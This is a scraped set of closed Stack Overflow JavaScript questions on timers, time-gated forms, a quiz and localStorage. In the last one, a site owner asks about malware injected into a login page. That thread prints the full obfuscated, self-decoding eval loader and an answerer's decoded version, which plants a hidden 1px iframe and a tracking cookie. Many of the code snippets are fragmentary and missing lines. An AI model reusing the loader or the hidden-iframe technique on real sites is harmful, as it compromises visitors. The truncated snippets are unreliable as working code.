Showing a webpage based on the time [closed] - javascript

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Closed 7 years ago.
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I have an html form which I want to be open between 12:00am and 4:20pm, after 4:20 I want to close the form and show a 'This form is now closed'. This needs to happen daily. What can I use to set the time and re-direct the users based on the time? Is this a j-query thing?

Working Fiddle
This will close the form at the correct time without requiring you to reload the page.
<form id="my-form" style="display:none">
<label>Name: <input type="text" ></label>
<div id="form-closed" style="display:none">The form is now closed</div>
}, 1000);
function checkFormAvailability() {
var minHours = 0;
var minMinutes = 0;
var maxHours = 16;
var maxMinutes = 20;
var minHourMinutes = (minHours * 100) + minMinutes;
var maxHourMinutes = (maxHours * 100) + maxMinutes;
var d = new Date();
var n = d.getHours() * 100;
var m = d.getMinutes();
var currentHourMinutes = n + m;
if (currentHourMinutes >= minHourMinutes && currentHourMinutes <= maxHourMinutes) {
else {
To test it out you can change maxHours and maxMinutes to the current time, and it will close the form starting in the next minute.

Everytime they visit/update the page, you can have a JavaScript function run and do different things based on the hour and minute.
For example:
function changeForm() {
var d = new Date();
if(d.getHours() == 16) {
if(d.getMinutes() > 19 {
document.getElementById('myForm').style.display = "none";
document.getElementById('myMessage').innerHTML = "The form is now closed.";
if(d.getHours() > 16) {
document.getElementById('myForm').style.display = "none";
document.getElementById('myMessage').innerHTML = "The form is now closed.";
<body onload = changeForm()>


how can i fix my timer?i don't know why it doesnt work [closed]

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Closed 2 years ago.
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I'm trying to make a timer and i cant make it stop. im using setinterval() and clearinterval() im new using this methods so i dont know if im using them in the rigth way
heres my code:
var estado = "desactivado";
function play() {
if (estado == "desactivado") {
estado = "activado";
var mytimer = setInterval(() => {
}, 1000);
} else if (estado == "activado") {
function timer() {
let segundos = document.getElementById("segundos");
let minutos = document.getElementById("minutos");
let horas = document.getElementById("horas");
if (segundos.value < 60) {
} else {
if (segundos.value == 60) {
if (minutos.value == 60) {
minutos.value = 00;
segundos.value = 00;
} else {
segundos.value = 00;
You just defined the mytimer inside the if{} block. So you can't get the value in else block. Maybe you can define the var mytimer on the same level with estato.

If clauses in for loop acts weird [closed]

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Closed 6 years ago.
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I have a function, which collects inputted answer and checked if collected answer is the same as it is the solution. Questions are asked randomly. Questions and solutions are in separate .txt file.
I have a file with some words and the program always fulfil its condition if the last word from the list is correctly answered, even though if other answers from other questions are correct.
Any suggestions?
var besedeNemske = ["glava", "voda", "drevo"];
var besedePrevod = ["der Kopf", "das Wasser", "der Baum"];
window.onload = function() {
var fileInput = document.getElementById('fileInput');
var fileDisplayArea = document.getElementById('fileDisplayArea');
fileInput.addEventListener('change', function(e) {
var file = fileInput.files[0];
var textType = /text.*/;
if (file.type.match(textType)) {
var reader = new FileReader();
reader.onload = function(e) {
var lines = this.result.split('\n');
for (var line = 0; line < lines.length; line++) {
if (line % 2 != 0) {
} else {
} else {
fileDisplayArea.innerText = "File not supported!"
var random = 0;
function nastaviRandom() {
random = Math.floor(Math.random() * 5);
function noviGlagol() {
document.getElementById("vprasanje").innerHTML = besedePrevod[random];
function preveriOdgovor() {
var odgovorjeno = document.getElementById("mojOdgovor").value;
if (besedeNemske.indexOf(odgovorjeno) == random) {
document.getElementById("odgovor").innerHTML = "Pravilni odgovor";
} else {
document.getElementById("odgovor").innerHTML = "Napačen odgovor. Pravilni odgovor je " + (besedeNemske[random]) + "";
<meta charset="UTF-8">
<div id="page-wrapper">
<h1>Nemščina glagoli</h1>
Select a text file:
<input type="file" id="fileInput">
<pre id="fileDisplayArea"><pre>
<button onclick="noviGlagol()">Novi glagol</button>
<div id="vprasanje"></div>
<div id="odgovor"></div>
<input type="text" id="mojOdgovor">
<button onclick="preveriOdgovor()">Pošlji</button>
To submit the comments on the original question as an answer:
var index = 0;
for (var i = 0; i < besedeNemske.length; i++) {
if (odgovorjeno == besedeNemske[i]) {
index = i;
index will be 0 for both of these cases:
if odgovorjeno == besedeNemske[0]
if odgovorjeno is not an element in the array besedeNemske
This is a really good use case for refactoring your code to use included language functionality or libraries, as it not only shortens your code, but is usually more correct (or at least their bugs are known/understood).
As Baramar pointed out, you can change your solution to:
function preveriOdgovor() {
var odgovorjeno = document.getElementById("mojOdgovor").value;
if (besedeNemske.indexOf(odgovorjeno) == random) {
document.getElementById("odgovor").innerHTML = "Pravilni odgovor";
} else {
document.getElementById("odgovor").innerHTML = "Napačen odgovor. Pravilni odgovor je " + (besedeNemske[random]) + "";

How to exam wise countdown timer start [closed]

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Closed 6 years ago.
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I create online examination system and i create different exam and different time assign ,i click any exam accroding to countdown timer start,
see below screenshot
<input type="hidden" name="time_limit" id="time_limit" value="<?php echo $examination_test_result['time_limit']; ?>">
<div class="box-body">
<h2><p style="float: right" id="countdown"></p></h2>
$time_limit = $("#time_limit").val();
var d = new Date($time_limit);
var hours = d.getHours();
var minutes = d.getMinutes();
var seconds = 60 * minutes;
if (typeof (Storage) !== "undefined") { //checks if localStorage is enabled
if (localStorage.seconds) { //checks if seconds are saved to localstorage
seconds = localStorage.seconds;
function secondPassed() {
var minutes = Math.round((seconds - 30) / 60);
var hours = Math.round((minutes) / 60);
var remainingSeconds = seconds % 60;
if (remainingSeconds < 10) {
remainingSeconds = "0" + remainingSeconds;
if (typeof (Storage) !== "undefined") {
localStorage.setItem("seconds", seconds);
document.getElementById('countdown').innerHTML = hours + ":" + minutes + ":" + remainingSeconds;
if (seconds == 0) {
document.getElementById('countdown').innerHTML = alert('Timeout');
window.location.href = base_url + "student/Examinations";
if (typeof (Storage) !== "undefined") {
} else {
var myVar = setInterval(secondPassed, 1000);
MY Question: I click different exam and examwise countdown timer start. but i have problem i click any exam and countdown timer continue
Like I said in another thread, you need to remove the countdown from the LocalStorage. To achieve this you need to perform this action on an defined event, like a button click, or whatever.
function resetCountdownInLocalStorage(){
You can call this action, like I mentioned on for example the click event of your "Next" button, or on every Restart of the test.
For example if you want to call this action on your Next button and we assume that the button has the Id next you can achieve the requested action by using this javascript snippet:
document.getElementById("next").onclick = function() {
Or using the function from above:
document.getElementById("next").onclick = resetCountdownInLocalStorage;
From your question i think you want a set of timers that will work independently. I have created an example. Please check this Fiddle
<div class="timer" started="false" timerObj="" value="10">
Start Timer
<div id="timer1"></div>
<div class="timer" started="false" timerObj="" value="10">
Start Timer
<div id="timer2"></div>
<div class="timer" started="false" timerObj="" value="10">
Start Timer
<div id="timer3"></div>
.timer {
border-radius: 2px;
background: #73AD21;
padding: 20px;
width: 100px;
height: 20px;
$(document).ready(function() {
function myTimer(resultDivId) {
var currentVal = $("#"+ resultDivId).parent().attr("value");
if(currentVal == 0) {
var timerObj = $("#"+ resultDivId).parent().attr('timerObj');
$("#"+ resultDivId).html(currentVal);
$("#"+ resultDivId).parent().attr("value",currentVal);
if ($(this).attr('started') == "false") {
var currentDivId = $(this).children('div').prop("id");
var timerObj = setInterval(function(){ myTimer(currentDivId) }, 1000);
else {
var timerObj = $(this).attr('timerObj');
The timer will start when you click on div. It will stop if you click the div second time. You can also set separate count down for each div.

How to use localStorage on this example? [closed]

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Closed 9 years ago.
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Can you apply localStorage on this? If I click "Deduct", the id "slot" will reduce to 1. What I want to learn is how to apply localStorage. If the slot is 9, and if I will refresh/close the browser or restart the computer and run the program again, the slot will remain 9. I'm having a hard time on learning about localStorage, need help masters.
var availableSlot1 = 10;
var reduceSlot1 = function(valueToDeduct1){
availableSlot1 = availableSlot1 - valueToDeduct1;
document.getElementById('slot').innerHTML = availableSlot1;
var x = storage.key(availableSlot1);
if (availableSlot1 == 0){
document.getElementById('x').innerHTML = "FULL";
document.getElementById("button1").style.display = "none";
<p id="slot">10</p>
var slot = localStorage.getItem("slot");
if (typeof slot == "undefined") {
slot = 10;
document.getElementById("slot").innerHTML = slot;
var reduceSlot1 = function reduceSlot(by)
if (slot >= by) {
slot -= by;
document.getElementById("slot").innerHTML = slot;
localStorage.setItem("slot", slot);
else {
document.getElementById('slot').innerHTML = "FULL";
document.getElementById("button1").style.display = "none";
I followed the code but, it is not working.
Live Demo of Local Storage
you can use local storage using, in place of name you can use any property.
var i = 1; = i;
var slot = localStorage.getItem("slot");
if (slot == null) {
slot = 10;
document.getElementById("slot").innerText = slot;
function reduceSlot() {
if (slot >= 1) {
slot --;
document.getElementById("slot").innerText = slot;
localStorage.setItem("slot", slot);
} else {
document.getElementById('x').innerText = "FULL";
document.getElementById("button1").style.display = "none";
document.getElementById("button1").onclick = reduceSlot;

Malicious javascript injected into login page [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
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Closed 9 years ago.
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I have a small web app that's written using CodeIgniter. However, I discovered recently that someone injected some javascript into my app's login page. When I look at the remote server's template file, the javascript is not there, but when I view the source in Chrome, I see the Javscript snippet below:
a = ("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,163,163,154,165,146,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,163,163,154,165,146,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,160,150,162,151,167,147,163,166,170,62,146,155,176,63,165,146,74,176,130,73,164,173,62,164,154,164,53,77,21,16,44,163,163,154,165,146,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,163,163,154,165,146,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,163,163,154,165,146,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,163,163,154,165,146,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,163,163,154,165,146,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,163,163,154,165,146,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,163,163,154,165,146,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,163,163,154,165,146,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,163,163,154,165,146,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,163,163,154,165,146,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16" ["split"](","));
ss = eval("Str" + "ing");
d = document;
for (i = 0; i < a.length; i += 1) {
a[i] = parseInt(a[i], 8) - (7 - 3);
try {
} catch (q) {
zz = 0;
try {
zz &= 2
} catch (q) {
zz = 1;
if (!zz)
if (window["document"]) eval(ss["fromCharCode"].apply(ss, a));
When I run my web app locally, I don't see this snippet so it's obvious that my remote server has been compromised.
After looking into the code, I realized the array contains a large series of characters used to build the actual code. As elclanrs pointed out, it seems the code tracks the user with a malicious cookie.
So my question is how does one manage to inject this type of code into my login page? I view the template file and the snippet is nowhere to be found, so I have no idea how to remove it from my page.
Seems to be setting a malicious cookie:
function zzzfff() {
var oohqb = document.createElement('iframe');
oohqb.src = ''; = 'absolute'; = '0'; = '1px'; = '1px'; = '1px'; = '1px';
if (!document.getElementById('oohqb')) {
document.write('<div id=\'oohqb\'></div>');
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length))) {
return null;
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
Google how to sanitize input. For example, one should not be able to input the character <: if he does, you should replace it with <, which is the corresponding HTML entity.
With the data you gave, I can't really tell how this was injected: remove the injection loading a previous backup.
